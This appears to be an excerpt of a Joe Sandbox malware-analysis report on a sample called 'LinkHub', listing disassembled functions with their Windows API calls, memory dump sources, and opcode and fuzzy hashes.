                                                                    Function 00CF2D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetForegroundWindow.USER32(?,?,00000000), ref: 00CF2D45
                                                                      • Part of subcall function 00CEEF33: GetWindowRect.USER32(?,?), ref: 00CEEF4B
                                                                    • GetDesktopWindow.USER32 ref: 00CF2D6F
                                                                    • GetWindowRect.USER32(00000000), ref: 00CF2D76
                                                                    • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00CF2DB2
                                                                    • GetCursorPos.USER32(?), ref: 00CF2DDE
                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00CF2E3C
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                    • String ID:
                                                                    • API String ID: 2387181109-0
                                                                    • Opcode ID: b40483a93e076d68a37c875fa13b19fed53c403188f519e7f363e30cc1c607ce
                                                                    • Instruction ID: bdbfb93054d5f8b33c369fa8f4667846d2bbce8eff91e7c02c8d65705b19f02a
                                                                    • Opcode Fuzzy Hash: b40483a93e076d68a37c875fa13b19fed53c403188f519e7f363e30cc1c607ce
                                                                    • Instruction Fuzzy Hash: 2831D272505319ABC720DF54C849BABB7AAFB85354F00051AF999D7281DB31EA05CBA2
                                                                    Function 00CD55E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsWindowVisible.USER32(?), ref: 00CD55F9
                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00CD5616
                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00CD564E
                                                                    • _wcslen.LIBCMT ref: 00CD566C
                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00CD5674
                                                                    • _wcsstr.LIBVCRUNTIME ref: 00CD567E
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                    • String ID:
                                                                    • API String ID: 72514467-0
                                                                    • Opcode ID: dd007024a6fa90413f5bdbe294b25ad8c2f585e73ea5004954e5f9a7f2d154c6
                                                                    • Instruction ID: 2baa6709d4803b1a84e01c41e4a7d367ac480a5e31f1b5d64726c6636797e2d9
                                                                    • Opcode Fuzzy Hash: dd007024a6fa90413f5bdbe294b25ad8c2f585e73ea5004954e5f9a7f2d154c6
                                                                    • Instruction Fuzzy Hash: 55212672204604BFEB155B699C49F7F7BA9EF44710F14402BFA09CA391EB61CD429660
                                                                    Function 00CE6263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C75851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C755D1,?,?,00CB4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C75871
                                                                    • _wcslen.LIBCMT ref: 00CE62C0
                                                                    • CoInitialize.OLE32(00000000), ref: 00CE63DA
                                                                    • CoCreateInstance.OLE32(00D10CC4,00000000,00000001,00D10B34,?), ref: 00CE63F3
                                                                    • CoUninitialize.OLE32 ref: 00CE6411
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                    • String ID: .lnk
                                                                    • API String ID: 3172280962-24824748
                                                                    • Opcode ID: 6418fc628216b46723560efd81060d8684ff91d57e8a4c371ffb050adec5b565
                                                                    • Instruction ID: bdb7f90e41809da68b6a13cd1483b8b60330da7998442919635cdad8c26e0d2e
                                                                    • Opcode Fuzzy Hash: 6418fc628216b46723560efd81060d8684ff91d57e8a4c371ffb050adec5b565
                                                                    • Instruction Fuzzy Hash: D8D16275A183019FC714DF26C484A2ABBE5FF98354F10885DF8999B361CB31ED49CB92
                                                                    Function 00D086FC Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00D08740
                                                                    • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00D08765
                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00D0877D
                                                                    • GetSystemMetrics.USER32(00000004), ref: 00D087A6
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00CEC1F2,00000000), ref: 00D087C6
                                                                      • Part of subcall function 00C7249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00C724B0
                                                                    • GetSystemMetrics.USER32(00000004), ref: 00D087B1
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long$MetricsSystem
                                                                    • String ID:
                                                                    • API String ID: 2294984445-0
                                                                    • Opcode ID: aae4695b9f087e901e6b8da8818f9d8963c80fa0b87370d7a8d3bc7bc58fcc2b
                                                                    • Instruction ID: 2a95934044b138602ad8e89538fbeb6e5b9d57721e2b4248bbc7ea22fcf6a9ba
                                                                    • Opcode Fuzzy Hash: aae4695b9f087e901e6b8da8818f9d8963c80fa0b87370d7a8d3bc7bc58fcc2b
                                                                    • Instruction Fuzzy Hash: A9219271610355AFCB145F78CC08B6A37A6EB85335F284629F9AAD32E4DF308850EB30
                                                                    Function 00C936F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,00C936E9,00C93355), ref: 00C93700
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C9370E
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C93727
                                                                    • SetLastError.KERNEL32(00000000,?,00C936E9,00C93355), ref: 00C93779
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastValue___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 3852720340-0
                                                                    • Opcode ID: ac3b8cab97fb6bc54124e1c953d91be8d3f9d2dd30e4e2c3c2b52e3af27067e3
                                                                    • Instruction ID: 506fbbcc325e91bc627374141b68cc07087a17be00e7b1253112273b6fa24c1b
                                                                    • Opcode Fuzzy Hash: ac3b8cab97fb6bc54124e1c953d91be8d3f9d2dd30e4e2c3c2b52e3af27067e3
                                                                    • Instruction Fuzzy Hash: 81014CB261D3912EEE2827F4BECE6673695EB15BB67200329F020C42F0EF114E126550
                                                                    Function 00CA30E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,00CA2908,00D39B48,0000000C,00C93268,00000001,?,?), ref: 00CA30EB
                                                                    • _free.LIBCMT ref: 00CA311E
                                                                    • _free.LIBCMT ref: 00CA3146
                                                                    • SetLastError.KERNEL32(00000000), ref: 00CA3153
                                                                    • SetLastError.KERNEL32(00000000), ref: 00CA315F
                                                                    • _abort.LIBCMT ref: 00CA3165
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_free$_abort
                                                                    • String ID:
                                                                    • API String ID: 3160817290-0
                                                                    • Opcode ID: 556548b6d9cb7564be350d7194b6c6793e68707d540fbf7658a51bf569931557
                                                                    • Instruction ID: 389e03d7ce20c40c31688adf9884dd9fa42a46b8e98fa6a40eba7e6c901e65b3
                                                                    • Opcode Fuzzy Hash: 556548b6d9cb7564be350d7194b6c6793e68707d540fbf7658a51bf569931557
                                                                    • Instruction Fuzzy Hash: FEF0A4769047532BC2226779AC1AF5E266A9FC377CB210415FA28D22D2EF248E02A571
                                                                    Function 00D09480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C71F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C71F87
                                                                      • Part of subcall function 00C71F2D: SelectObject.GDI32(?,00000000), ref: 00C71F96
                                                                      • Part of subcall function 00C71F2D: BeginPath.GDI32(?), ref: 00C71FAD
                                                                      • Part of subcall function 00C71F2D: SelectObject.GDI32(?,00000000), ref: 00C71FD6
                                                                    • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00D094AA
                                                                    • LineTo.GDI32(?,00000003,00000000), ref: 00D094BE
                                                                    • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00D094CC
                                                                    • LineTo.GDI32(?,00000000,00000003), ref: 00D094DC
                                                                    • EndPath.GDI32(?), ref: 00D094EC
                                                                    • StrokePath.GDI32(?), ref: 00D094FC
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                    • String ID:
                                                                    • API String ID: 43455801-0
                                                                    • Opcode ID: 7483dfaaba31a83d33c63ab1384cbc86fea230663f0f3b5c36f5b79437d769eb
                                                                    • Instruction ID: 4865cbdb14ae2a7b7457a6ac19a242b4e65afaeae9cf65b71525139ae3d36c29
                                                                    • Opcode Fuzzy Hash: 7483dfaaba31a83d33c63ab1384cbc86fea230663f0f3b5c36f5b79437d769eb
                                                                    • Instruction Fuzzy Hash: 7711CC76000209BFEB129F94DC89FAA7F6DEF08364F04C012FA1D952A1C7719D559BB0
                                                                    Function 00CD5B61 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 00CD5B7C
                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00CD5B8D
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CD5B94
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00CD5B9C
                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00CD5BB3
                                                                    • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00CD5BC5
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDevice$Release
                                                                    • String ID:
                                                                    • API String ID: 1035833867-0
                                                                    • Opcode ID: c72e26d2395d5d8b50aa9b73c959a355f31233c62ecbeadd3e4db76c627a7601
                                                                    • Instruction ID: 4d6a45963f6d44c05923575609976a082122b580d47d2f8e17cec98f22260502
                                                                    • Opcode Fuzzy Hash: c72e26d2395d5d8b50aa9b73c959a355f31233c62ecbeadd3e4db76c627a7601
                                                                    • Instruction Fuzzy Hash: 85012C75E00718BBEB109BE59C49F5ABFA9EB48751F104066FA09E7380D6709900CBA0
                                                                    Function 00C7327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C732AF
                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00C732B7
                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C732C2
                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C732CD
                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00C732D5
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C732DD
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual
                                                                    • String ID:
                                                                    • API String ID: 4278518827-0
                                                                    • Opcode ID: b514a46ead49f0f31a5beea394df5c34444fb662a7b35ee0cc07aaba936763c8
                                                                    • Instruction ID: c92b6034ea9dbb3d261d36fb9663b9330f7a3d5c9f4d67bb38ccb596787bab61
                                                                    • Opcode Fuzzy Hash: b514a46ead49f0f31a5beea394df5c34444fb662a7b35ee0cc07aaba936763c8
                                                                    • Instruction Fuzzy Hash: 43016CB09017597DE3008F5A8C85B52FFA8FF19354F00411B915C47A41C7F5A864CBE5
                                                                    Function 00CDF437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00CDF447
                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00CDF45D
                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00CDF46C
                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CDF47B
                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CDF485
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CDF48C
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                    • String ID:
                                                                    • API String ID: 839392675-0
                                                                    • Opcode ID: 3fb86af0db0e03f0b05dfe108f20edac5abc64eacab4be1c20a025342d951311
                                                                    • Instruction ID: 585b7609afc677ed19a77b10699af725c8c4e757f15dedfbc84d4d956cba4f64
                                                                    • Opcode Fuzzy Hash: 3fb86af0db0e03f0b05dfe108f20edac5abc64eacab4be1c20a025342d951311
                                                                    • Instruction Fuzzy Hash: B8F03032241258BBE7215B929C0EFEF7B7DEFC6B11F00005AF609D1290DBA15A02C6B6
                                                                    Function 00CB34D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetClientRect.USER32(?), ref: 00CB34EF
                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 00CB3506
                                                                    • GetWindowDC.USER32(?), ref: 00CB3512
                                                                    • GetPixel.GDI32(00000000,?,?), ref: 00CB3521
                                                                    • ReleaseDC.USER32(?,00000000), ref: 00CB3533
                                                                    • GetSysColor.USER32(00000005), ref: 00CB354D
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                    • String ID:
                                                                    • API String ID: 272304278-0
                                                                    • Opcode ID: 09d3deae6264b13e1446e2b5ea66ba404786f557b3d786658b18dd9a8a07f582
                                                                    • Instruction ID: 5dee0cef268dcb0c808b9f79ba2369c68c44c5282f2d169a7ad9ec64102fe252
                                                                    • Opcode Fuzzy Hash: 09d3deae6264b13e1446e2b5ea66ba404786f557b3d786658b18dd9a8a07f582
                                                                    • Instruction Fuzzy Hash: EE014B31500205EFDB605FA4DC08BE97BB2FB48321F510165FA2AE22A0CF321E55AB21
                                                                    Function 00CD21C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CD21CC
                                                                    • UnloadUserProfile.USERENV(?,?), ref: 00CD21D8
                                                                    • CloseHandle.KERNEL32(?), ref: 00CD21E1
                                                                    • CloseHandle.KERNEL32(?), ref: 00CD21E9
                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00CD21F2
                                                                    • HeapFree.KERNEL32(00000000), ref: 00CD21F9
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                    • String ID:
                                                                    • API String ID: 146765662-0
                                                                    • Opcode ID: 7e5b382c5d494fd5427865ac9ee2026c4c9d6125eb9dfb2c1822678a96e2cd2b
                                                                    • Instruction ID: cc9ac550dd4ab6e5893948e1fff89c4074f0fb8fa05df80a77d9fdd5dbfafcc2
                                                                    • Opcode Fuzzy Hash: 7e5b382c5d494fd5427865ac9ee2026c4c9d6125eb9dfb2c1822678a96e2cd2b
                                                                    • Instruction Fuzzy Hash: 70E07D76104705BBD7011FE5EC0DA45BF7AFF597217508626F229C2670CB325461DB61
                                                                    Function 00CDCE7B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C741EA: _wcslen.LIBCMT ref: 00C741EF
                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CDCF99
                                                                    • _wcslen.LIBCMT ref: 00CDCFE0
                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CDD047
                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00CDD075
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info_wcslen$Default
                                                                    • String ID: 0
                                                                    • API String ID: 1227352736-4108050209
                                                                    • Opcode ID: c091772262adefda0566a6d0e664942bcf9183b2bff7975c8405f56d1845cd91
                                                                    • Instruction ID: 09fa08c8f89888b66eb2a19e17a2f72ba09431941d0c2b798f80933152c93a3d
                                                                    • Opcode Fuzzy Hash: c091772262adefda0566a6d0e664942bcf9183b2bff7975c8405f56d1845cd91
                                                                    • Instruction Fuzzy Hash: 2E51D171A043019BD714AF64C885BABB7E8AF85314F040A2FFAA6D3391DB70DA45C752
                                                                    Function 00CFB7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00CFB903
                                                                      • Part of subcall function 00C741EA: _wcslen.LIBCMT ref: 00C741EF
                                                                    • GetProcessId.KERNEL32(00000000), ref: 00CFB998
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00CFB9C7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                    • String ID: <$@
                                                                    • API String ID: 146682121-1426351568
                                                                    • Opcode ID: f1e92bcda59d3e61cac6ac1b8f423cc9dbf773d2aca84958e4a6902d8948a89f
                                                                    • Instruction ID: e1398e6f235ba21a5ab87ea93944eca9350d80758f793764b8a131268313704f
                                                                    • Opcode Fuzzy Hash: f1e92bcda59d3e61cac6ac1b8f423cc9dbf773d2aca84958e4a6902d8948a89f
                                                                    • Instruction Fuzzy Hash: 76716B75A00219DFCB14EF64C494AADBBF5FF08310F048499E959AB391CB74EE45CB91
